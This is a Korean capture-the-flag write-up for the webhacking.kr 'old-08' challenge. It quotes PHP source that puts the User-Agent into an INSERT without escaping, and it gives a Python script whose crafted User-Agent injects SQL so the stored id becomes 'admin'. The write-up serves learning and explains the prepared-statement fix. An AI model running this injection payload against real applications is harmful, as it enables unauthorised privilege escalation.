# old-08 (350)

첫 화면이다.

![](https://4149640791-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-LybinW10qeKqY56a-jw%2F-Lz-dMrwtMqAFBU1I4I2%2F-Lz-doZkuc6tFyKzcQE6%2Fimage.png?alt=media\&token=872e2e3a-07e8-4405-99c0-a1ab2a3c4cc7)

view-source를 클릭해 본 코드의 일부는 아래와 같다.

```php
<?php
// Challenge source (excerpt): stores each visitor's User-Agent in `chall8` and
// calls solve(8) when the row found for that User-Agent has id "admin".
// dbconnect() and solve() are defined outside this excerpt.

// User-Agent as the server sees it, with surrounding whitespace trimmed.
$agent=trim(getenv("HTTP_USER_AGENT"));
$ip=$_SERVER['REMOTE_ADDR'];
// Keyword blocklist: rejects only values that contain "from" (case-insensitive).
// NOTE(review): a one-keyword filter does not neutralise quotes or other SQL
// metacharacters, so it is not an injection defence.
if(preg_match("/from/i",$agent)){
  echo("<br>Access Denied!<br><br>");
  echo(htmlspecialchars($agent));
  exit();
}
$db = dbconnect();
// Housekeeping: once the table holds 70 or more rows, delete all of them.
$count_ck = mysqli_fetch_array(mysqli_query($db,"select count(id) from chall8"));
if($count_ck[0] >= 70){ mysqli_query($db,"delete from chall8"); }

// Lookup: here the User-Agent goes through addslashes() before it is placed
// inside the quoted SQL string. It reads the raw header, not the trimmed $agent.
// NOTE(review): addslashes() is not charset-aware; binding the value through a
// prepared statement is the robust form.
$result = mysqli_query($db,"select id from chall8 where agent='".addslashes($_SERVER['HTTP_USER_AGENT'])."'");
$ck = mysqli_fetch_array($result);

if($ck){
  // The stored id is HTML-encoded before it is echoed back.
  echo "hi <b>".htmlentities($ck[0])."</b><p>";
  if($ck[0]=="admin"){
    mysqli_query($db,"delete from chall8");
    solve(8);
  }
}

// No row matched this User-Agent: register it as a new 'guest' row.
if(!$ck){
  // SECURITY: unlike the SELECT above, $agent and $ip are interpolated into the
  // SQL text with no escaping or binding. A quote in the User-Agent ends the
  // string literal, so the client decides the rest of the VALUES list, including
  // the `id` column that is meant to be the constant 'guest'.
  // Fix: build both queries with mysqli_prepare() + mysqli_stmt_bind_param().
  $q=mysqli_query($db,"insert into chall8(agent,ip,id) values('{$agent}','{$ip}','guest')") or die("query error");
  echo("<br><br>done!  ({$count_ck[0]}/70)");
}
?>
```

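SELECT 쿼리는 User-Agent를 `addslashes()`로 이스케이프하지만, INSERT 쿼리는 `$agent`를 이스케이프 없이 그대로 SQL 문자열에 넣는다. 그래서 User-Agent 값에 따라 `id` 칼럼에 `'guest'`가 아닌 값이 저장될 수 있다(두 쿼리 모두 prepared statement로 값을 바인딩했다면 생기지 않는 문제다). `$ck[0]` 값을 `"admin"`으로 만들기 위해 아래와 같은 코드를 작성해 실행하면 문제가 풀린다.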

```python
import urllib.request

# Endpoint of the webhacking.kr old-08 practice challenge.
URL = "https://webhacking.kr/challenge/web-08/"
# Placeholder: replace with the session cookie value of your own account.
PHPSESSID = "MY_PHPSESSID"


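def query(header):
    """Send one request with *header* as the User-Agent and print the body.

    Uses the module-level ``req`` object, which already carries the session
    cookie. ``add_header`` overwrites the User-Agent set by a previous call,
    so the same request object can be reused.
    """
    req.add_header('User-Agent', header)
    # The context manager closes the HTTP response even if read/decode raises.
    with urllib.request.urlopen(req) as r:
        content = r.read().decode('utf-8')
    print(content)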


# One shared request object carrying the session cookie; query() only swaps
# its User-Agent between calls.
req = urllib.request.Request(URL, headers={'Cookie': 'PHPSESSID=' + PHPSESSID})
# The first value is stored by the page's INSERT (no row matches it yet);
# the second is then found by the page's SELECT.
for user_agent in ("donghyunlee00', '0', 'admin')#", "donghyunlee00"):
    query(user_agent)
```
